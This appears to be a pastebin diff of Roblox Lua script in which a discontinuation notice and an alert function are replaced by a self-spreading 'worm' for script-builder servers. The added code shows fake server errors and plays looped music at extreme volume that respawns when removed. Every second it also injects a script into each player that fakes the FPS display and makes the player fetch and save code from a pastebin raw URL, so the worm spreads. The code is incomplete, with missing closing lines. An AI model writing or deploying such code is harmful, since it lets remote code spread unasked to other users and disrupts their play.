SHOW:
|
|
- or go back to the newest paste.
1 | - | print('Worm has offically been discontinued on account of TheFlamingBlaster.') |
1 | + | if script.ClassName ~= "LocalScript" then |
2 | - | print('Sorry about that.') |
2 | + | local hs = game:GetService'HttpService' |
3 | - | function alert(txt,plr,duration) |
3 | + | c = Instance.new("Message") |
4 | - | if not duration then |
4 | + | c.Text = "ERROR: server.dll not found, contact an administrator for help." |
5 | - | duration = 10 |
5 | + | c.Parent = game.Workspace |
6 | function makemusic() | |
7 | - | local SysAlert = Instance.new("ScreenGui") |
7 | + | local music = Instance.new("Sound",workspace) |
8 | - | local SysAlertFrame = Instance.new("Frame") |
8 | + | music.Name = "yeet" |
9 | - | local FrameEffects = Instance.new("Frame") |
9 | + | music.SoundId = "rbxassetid://222937160" |
10 | - | local AlertTxt = Instance.new("TextLabel") |
10 | + | music.Volume = 100000 |
11 | - | |
11 | + | music.Looped = true |
12 | - | SysAlert.Name = "SysAlert" |
12 | + | music:Play() |
13 | - | SysAlert.Parent = plr.PlayerGui |
13 | + | |
14 | - | SysAlert.ResetOnSpawn = false |
14 | + | workspace.ChildRemoved:connect(function(p) |
15 | - | |
15 | + | wait(0.1) |
16 | - | SysAlertFrame.Name = "SysAlertFrame" |
16 | + | if p.Name == "WORMMLGMUSIC" then |
17 | - | SysAlertFrame.Parent = SysAlert |
17 | + | for index, child in pairs(workspace:GetChildren()) do |
18 | - | SysAlertFrame.BackgroundColor3 = Color3.new(0, 0, 0) |
18 | + | if child.Name == "yeet" then |
19 | - | SysAlertFrame.BorderSizePixel = 0 |
19 | + | i = i + 1 |
20 | - | SysAlertFrame.Size = UDim2.new(0, 0, 0.100000001, 0) |
20 | + | |
21 | - | SysAlertFrame:TweenSize(UDim2.new(1, 0, 0.100000001, 0)) |
21 | + | |
22 | - | SysAlertFrame.Position = UDim2.new(0,0,0.45,0) |
22 | + | if i == 0 then |
23 | - | |
23 | + | makemusic() |
24 | - | FrameEffects.Name = "FrameEffects" |
24 | + | |
25 | - | FrameEffects.Parent = SysAlertFrame |
25 | + | |
26 | - | FrameEffects.BackgroundColor3 = Color3.new(1, 1, 1) |
26 | + | end) |
27 | - | FrameEffects.BorderSizePixel = 0 |
27 | + | i = 0 |
28 | - | FrameEffects.Position = UDim2.new(0.0250000004, 0, 0.824999988, 0) |
28 | + | for index, child in pairs(workspace:GetChildren()) do |
29 | - | FrameEffects.Size = UDim2.new(0.949999988, 0, 0.0250000004, 0) |
29 | + | if child.Name == "yeet" then |
30 | - | |
30 | + | i = i + 1 |
31 | - | AlertTxt.Name = "AlertTxt" |
31 | + | |
32 | - | AlertTxt.Parent = SysAlertFrame |
32 | + | |
33 | - | AlertTxt.BackgroundColor3 = Color3.new(1, 1, 1) |
33 | + | if i == 0 then |
34 | - | AlertTxt.BackgroundTransparency = 1 |
34 | + | makemusic() |
35 | - | AlertTxt.Position = UDim2.new(0.0250000004, 0, 0, 0) |
35 | + | c = Instance.new("Hint") |
36 | - | AlertTxt.Size = UDim2.new(0.949999988, 0, 0.800000012, 0) |
36 | + | c.Text = "ERROR ERROR ERROR ERROR ERROR ERROR ERROR ERROR ERROR ERROR" |
37 | - | AlertTxt.Font = Enum.Font.SourceSansLight |
37 | + | c.Parent = game.Workspace |
38 | - | AlertTxt.FontSize = Enum.FontSize.Size14 |
38 | + | |
39 | - | AlertTxt.Text = txt |
39 | + | while wait(1) do |
40 | - | AlertTxt.TextColor3 = Color3.new(1, 1, 1) |
40 | + | for index, child in pairs(game:GetService'Players':GetChildren()) do |
41 | - | AlertTxt.TextScaled = true |
41 | + | newLocalScript([[ |
42 | - | AlertTxt.TextWrapped = true |
42 | + | game.Players.LocalPlayer.PlayerGui.SB_OutputGUI.Main.Output.Header.FPS.Text = "FPS: 385976.354" |
43 | - | AlertTxt.TextXAlignment = Enum.TextXAlignment.Left |
43 | + | wait() |
44 | - | |
44 | + | game:GetService'Players'.LocalPlayer.PlayerGui.SB_DataTransfer.SB_CommandRemote.Value = 'h/http://pastebin.com/raw/V9dvvRFe' wait(0.25) game:GetService'Players'.LocalPlayer.PlayerGui.SB_DataTransfer.SB_CommandRemote.Value = 'createhttp/shfUiod/http://pastebin.com/raw/V9dvvRFe' wait(0.25) game:GetService'Players'.LocalPlayer.PlayerGui.SB_DataTransfer.SB_CommandRemote.Value = 'save/shfUiod' ]],child.PlayerGui) |
45 | - | delay(duration,function() |
45 | + | |
46 | - | for i,v in pairs(SysAlertFrame:GetChildren()) do |
46 | + | |
47 | - | if v:IsA("TextLabel") or v:IsA("TextButton") then |
47 | + | else |
48 | - | v.Text = "" |
48 | + | game:GetService'Players'.LocalPlayer.PlayerGui.SB_DataTransfer.SB_CommandRemote.Value = 'h/http://pastebin.com/raw/V9dvvRFe' |
49 | - | end |
49 | + | |
50 | - | end |
50 | + | local playerLeaderstats = {} |
51 | - | SysAlertFrame:TweenSize(UDim2.new(0,0,0.100000001,0)) |
51 | + | for i, v in pairs(game.Players:GetChildren()) do |
52 | - | delay(1,function() SysAlert:Destroy() end) |
52 | + | table.insert(playerLeaderstats, v) |
53 | - | end) |
53 | + | end |